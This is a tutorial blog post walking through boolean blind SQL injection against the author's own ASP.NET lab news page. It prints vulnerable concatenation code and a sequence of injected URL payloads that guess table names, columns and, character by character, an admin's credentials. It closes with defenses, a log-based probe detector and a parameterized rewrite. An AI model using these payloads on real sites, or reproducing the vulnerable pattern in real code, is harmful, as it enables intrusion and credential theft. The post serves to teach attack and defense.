
Web Security: SQL Injection (Part 1): Blind Injection

Author: 超期服役  Published: 2016-12-19 20:31:54
SQL injection is a fairly "old" topic. Although few sites still have this kind of vulnerability, it is still worth understanding the damage it can do and the techniques commonly used: know yourself and know your enemy, and you will never be defeated. Attack and defense relate like spear and shield; if we clearly understand the whole course of an attack, we can better prevent similar situations from arising.

How SQL injection works: the attacker exploits flaws in the targeted page (usually the result of programmer carelessness) to change the SQL statement the database executes, and so obtains "unauthorized information".

I set up a lab environment of my own for testing. The test environment is written in ASP.NET and uses an MSSQL database. The test page imitates an ordinary news page and takes the article ID from the URL parameter ?id=1.

The back end concatenates the received ID straight into the query, with no filtering of sensitive characters, which leaves an opening for an intruder. Here is the back-end code:

        using System;
        using System.Data;

        public partial class NewsInfo : System.Web.UI.Page
        {
            protected NewsModel _news = new NewsModel();
            protected void Page_Load(object sender, EventArgs e)
            {
                // The id is read from the query string with no validation
                var id = Request["id"];
                // Vulnerable: the raw value is concatenated into the SQL text
                var sqlStr = "select * from news where id=" + id;
                var sqlCon = SqlHelper.GetConnection();

                try
                {
                    var ds = SqlHelper.ExecuteDataset(sqlCon, CommandType.Text, sqlStr);

                    // No row returned (e.g. the appended condition was false): the page stays blank
                    if (ds.Tables[0].Rows.Count <= 0) return;

                    _news.Title = ds.Tables[0].Rows[0]["title"].ToString();
                    _news.Text = ds.Tables[0].Rows[0]["text"].ToString();
                    _news.CreateTime = ((DateTime)ds.Tables[0].Rows[0]["createTime"]).ToString("yyyy-MM-dd");
                }
                catch (Exception ex)
                {
                    // Errors are swallowed, so a failed query also produces a blank page
                }
            }
        }

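I. Reproducing the attack

1. Testing for an injection vulnerability

Enter in the browser:

    http://localhost:2003/newsInfo?id=1 and 1=1

The page displays normally. The SQL statement executed by the back end is: select * from news where id=1 and 1=1

Enter:

    http://localhost:2003/newsInfo?id=1 and 1=2

A blank page is returned and no data is shown (the SQL statement executed by the back end is: select * from news where id=1 and 1=2). Because the response changes with the truth of the appended condition, the parameter is being executed as part of the SQL statement: the page has an injection vulnerability.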

     

2. Guessing the database table name

Since there is a hole, let's do something with it. The main goal is to obtain the back-end administrator's password, so first see which tables the database has.

    http://localhost:2003/newsInfo?id=1 and (select count(*) from userInfo) >=0

No data. Keep guessing ... N times, until finally:

    http://localhost:2003/newsInfo?id=1 and (select count(*) from [user]) >=0

This uses the appended condition to query a database table. If the table does not exist, the back end raises an error. In this test the back end handles the exception, but no data can come out either way.

The data displays normally, which shows that the table user exists; it is taken to be the user table.

3. Guessing the table's columns

    http://localhost:2003/newsInfo?id=1 and (select count(password) from [user]) >=0

....... N times

    http://localhost:2003/newsInfo?id=1 and (select count(pwd) from [user]) >=0

The page data displays normally, as shown in the figure below.

This shows that the table user has a pwd column.

In the same way, confirm that the table user has a name column.

4. Finding out how many rows the table has

    http://localhost:2003/newsInfo?id=1 and (select count(*) from [user]) >=5

Returns a blank page.

    http://localhost:2003/newsInfo?id=1 and (select count(*) from [user]) >=2

Returns a blank page.

    http://localhost:2003/newsInfo?id=1 and (select count(*) from [user]) =1

The page displays normally: there is only one user.

5. Guessing the user name

<A> Length of the user name

    http://localhost:2003/newsInfo?id=1 and (select len(name) from [user]) =3

Returns a blank page.

    http://localhost:2003/newsInfo?id=1 and (select len(name) from [user]) =4

Returns a blank page.

    http://localhost:2003/newsInfo?id=1 and (select len(name) from [user]) =5

Returns the normal page, so the user name is 5 characters long.

<B> Guessing the user name

First character:

    http://localhost:2003/newsInfo?id=1 and (select ASCII(SUBSTRING(name,1,1)) from [user])> 20

Returns the normal page ...........

N more guesses follow:

    http://localhost:2003/newsInfo?id=1 and (select ASCII(SUBSTRING(name,1,1)) from [user])> 96

Returns the normal page.

    http://localhost:2003/newsInfo?id=1 and (select ASCII(SUBSTRING(name,1,1)) from [user])> 97

Returns a blank page.

This shows that the first character's ASCII value is 97, which is the letter a.

Continue in the same way for the 2nd, 3rd ..... 5th characters, and the user name admin is recovered. The ASCII and SUBSTRING functions do the main work here; if you are not familiar with these two functions, look them up yourself. Below are screenshots of the guessing process.

The user name has been guessed successfully.

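6. Guessing the password

With the user name done, the password follows the same approach.

<A> First determine the password length.

<B> Guess the password one character at a time. The injected SQL statements are not written out here; they are the same as for the user name.

At this point, the site's entire admin back end has fallen.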
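Seen from the server side, the walkthrough above is a burst of requests from one client in which id is never a plain number. The following is an added example, not part of the original article, that counts such requests per client; the log format, the sample lines, the class and method names and the threshold of 3 are all constructed for illustration.

```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text.RegularExpressions;

static class BlindSqliLogCheck
{
    // Constructed sample in a simplified "client-ip path?query" form (not real logs).
    static readonly string[] SampleLog =
    {
        "10.0.0.5 /newsInfo?id=1",
        "10.0.0.9 /newsInfo?id=1%20and%201=1",
        "10.0.0.9 /newsInfo?id=1%20and%20(select%20count(*)%20from%20[user])%20>=0",
        "10.0.0.9 /newsInfo?id=1%20and%20(select%20len(name)%20from%20[user])%20=5",
        "10.0.0.9 /newsInfo?id=1%20and%20(select%20ASCII(SUBSTRING(name,1,1))%20from%20[user])>%2096",
        "10.0.0.7 /newsInfo?id=42",
    };

    static readonly Regex IdParam = new Regex(@"[?&]id=([^&\s]*)", RegexOptions.IgnoreCase);
    static readonly Regex PlainInteger = new Regex(@"\A[0-9]+\z");

    // Per client, count requests whose id is anything other than a plain integer.
    public static Dictionary<string, int> CountNonNumericIds(IEnumerable<string> lines)
    {
        var hits = new Dictionary<string, int>();
        foreach (var line in lines)
        {
            var parts = line.Split(new[] { ' ' }, 2);
            if (parts.Length < 2) continue;
            var m = IdParam.Match(parts[1]);
            if (!m.Success) continue;
            // Decode %20 and '+' so encoded payloads are judged like plain ones.
            var value = Uri.UnescapeDataString(m.Groups[1].Value.Replace('+', ' ')).Trim();
            if (PlainInteger.IsMatch(value)) continue;
            int n;
            hits.TryGetValue(parts[0], out n);
            hits[parts[0]] = n + 1;
        }
        return hits;
    }

    static void Main()
    {
        const int threshold = 3; // assumed cut-off for "repeated probing"
        foreach (var c in CountNonNumericIds(SampleLog).Where(c => c.Value >= threshold))
            Console.WriteLine("{0}: {1} requests with a non-numeric id", c.Key, c.Value);
    }
}
```

Because the legitimate page only ever sends an integer id, any non-numeric value is already anomalous; the per-client count separates a stray malformed link from sustained character-by-character guessing.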

II. Defenses

1. Validate input on the back end and filter sensitive characters. (Not fully reliable in some cases: sensitive characters may be missed, and an attacker can escape key characters to get around the filter.)

2. Use stored procedures. (Inflexible; a large number of stored procedures is hard to maintain, especially if they contain business logic, which makes later maintenance a disaster and problems hard to trace.)

3. Use parameterized queries; wherever SQL concatenation can be avoided, do not concatenate SQL statements. (Of course, in this example simply checking that the ID parameter is a number would already remove the problem.)
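The test page rewritten with defenses 1 and 3 applied, as an added example that is not the original author's code. It assumes that SqlHelper.GetConnection() (the article's helper) returns a SqlConnection and that news has the columns title, text and createTime read by the original page; answering a bad id with status 400 is a choice made here.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

public partial class NewsInfo : System.Web.UI.Page
{
    protected NewsModel _news = new NewsModel();

    protected void Page_Load(object sender, EventArgs e)
    {
        // Defense 1: id must be a positive integer. "1 and 1=2" fails to parse
        // and never reaches the database.
        int id;
        if (!int.TryParse(Request["id"], out id) || id <= 0)
        {
            Response.StatusCode = 400;
            return;
        }

        // Defense 3: the SQL text is a constant. The value travels separately as
        // a typed parameter, so it cannot change the structure of the statement.
        const string sql =
            "select title, [text], createTime from news where id = @id";

        // Assumption: the article's SqlHelper.GetConnection() returns a SqlConnection.
        using (SqlConnection con = SqlHelper.GetConnection())
        using (var cmd = new SqlCommand(sql, con))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            if (con.State != ConnectionState.Open) con.Open();

            using (SqlDataReader row = cmd.ExecuteReader(CommandBehavior.SingleRow))
            {
                if (!row.Read()) return; // no article with this id

                _news.Title = row["title"].ToString();
                _news.Text = row["text"].ToString();
                _news.CreateTime = ((DateTime)row["createTime"]).ToString("yyyy-MM-dd");
            }
        }
    }
}
```

With this version every request from the walkthrough is rejected at the integer check, and even without that check the parameter would be compared to the id column as a value rather than parsed as SQL.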
